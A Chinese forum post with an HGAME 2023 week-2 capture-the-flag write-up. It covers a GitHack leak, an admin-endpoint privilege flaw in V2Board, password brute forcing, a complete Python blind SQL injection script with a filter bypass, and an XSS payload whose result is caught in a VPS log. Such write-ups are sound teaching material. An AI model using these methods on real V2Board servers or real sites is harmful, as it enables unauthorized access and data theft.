HGAME2023_WP_WEEK2

打印 上一主题 下一主题

主题 882|帖子 882|积分 2646

Git LeakageGithack一波带走,下载得到flag

v2board搜索得知V2Board存在越权漏洞,随便注册个账号拿到authorization
访问/api/v1/admin/user/fetch?pageSize=10&current=1
  
 拿到token值,hgame{39d580e71705f6abac9a414def74c466}
Search Commodity弱口令爆破得到密码admin123,登录进去是一个搜索框,很明显是sql注入,bp构造一个search_id=1$select$*2,fuzz一下,发现好多都被过滤为空,这里给出部分 
 
这里发现大写能够绕过过滤,我们写一个盲注脚本
  1. import requests
  2. import string
  3. strs = string.printable
  4. headers = {
  5.     'Cookie': 'SESSION=MTY3MzY2MDExM3xEdi1CQkFFQ180SUFBUkFCRUFBQUpQLUNBQUVHYzNSeWFXNW5EQVlBQkhWelpYSUdjM1J5YVc1bkRBZ0FCblZ6WlhJd01RPT18adCvaHER65QoUwkQqK1elOtFjUAT9stHSgpZfPrUWik='
  6. }
  7. flag = ''
  8. def attack(url):
  9.     global flag
  10.     for i in range(1, 100):
  11.         for j in strs:
  12.             if j == '%':
  13.                 continue
  14.             tmp = ord(j)
  15.             payload = 'DATABASE()'
  16.             payload1 = 'SELECT(GROUP_CONCAT(TABLE_NAME))FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA)like(DATABASE())'
  17.             payload2 = "SELECT(GROUP_CONCAT(COLUMN_NAME))FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME)like('5ecret15here')"
  18.             payload3 = 'SELECT(f14gggg1shere)FROM(5ecret15here)'
  19.             data = {
  20.                 'search_id': f"0||((ascii(substr(({payload3}),{i},1)))like({tmp}))"
  21.             }
  22.             r = requests.post(url, data=data, headers=headers)
  23.             if 'hard disk' in r.text:
  24.                 flag += j
  25.                 print(flag)
  26.                 break
  27.         if flag.endswith('}'):
  28.             break
  29. if __name__ == '__main__':
  30.     url = 'http://week-2.hgame.lwsec.cn:32034/search'
  31.     attack(url)
复制代码
最后flag为:hgame{4_M4n_WH0_Kn0ws_We4k-P4ssW0rd_And_SQL!}Designer附件下载下来是一套js源码,看index.js,/user/register伪造ip无果,应该是xss 
 我们写一个xhr请求,让本地来访问就能成功伪造ip,得到true flag

利用在线xss_platform,把代码丢里头,Box shadow里填入xss攻击payload,注意这里要闭合下标签,这里有个坑,得先preview一下再share,才能触发本地访问,不知道是不是就我一个人有这个问题 
 最后我们在vps的web日志里找到请求信息,本想直接输出来着,但没成功

jwt解密得到flag

 
 
 
 

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

怀念夏天

金牌会员
这个人很懒什么都没写!
快速回复 返回顶部 返回列表